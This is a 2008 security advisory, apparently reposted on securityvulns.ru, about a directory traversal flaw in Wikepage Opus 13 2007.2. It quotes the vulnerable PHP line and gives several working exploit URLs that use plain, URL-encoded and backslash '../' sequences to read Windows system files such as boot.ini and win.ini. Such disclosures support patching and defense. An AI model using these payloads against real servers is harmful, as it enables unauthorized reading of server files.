Computer Security

Security Advisory: Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpTournois <= G4 Remote File Upload/Code Execution Exploit

  WoltLab(R) Community Framework XSS and Full Path Disclosure Vulnerability

  Swiki 1.5 Multiple Cross-Site Scripting Vulnerabilities

  Attack Technique: File Download Injection

From:virangar_nml_(at)_yahoo.com <virangar_nml_(at)_yahoo.com>
Date:08.04.2008
Subject:Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility

            #####################################################################
#########
            #                                                                            #
            #  ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ::::.... #         
            #####################################################################
#########

## AUTHOR :  Virangar Security Team (A.Nosrati )
## Email  :  Virangar_nml@yahoo.com or 9120000000@yahoo.com  or Virangar_SECRET@hotmail.com
##ICQ:       445117030
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversa

Virangar Security Team
VIRANGAR UNDER GR0UND TEAM

Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site :  http://www.wikepage.org/
(Download
http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wi
kepage2007_2.zip&use_mirror=puzzle)

-----------------------------------
vulnerability Path :

vuln code in [localhost]/wikepage/index.php
Sample Of vulnerabil  Line : $ templatefile=$_GET['template'];  (Line 586) And More .....


Exploit :
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.
ini  
or
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../..
/boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c#
%2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..
\..\..\..\..\WINDOWS\win.ini
and more ........


Good Luck
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru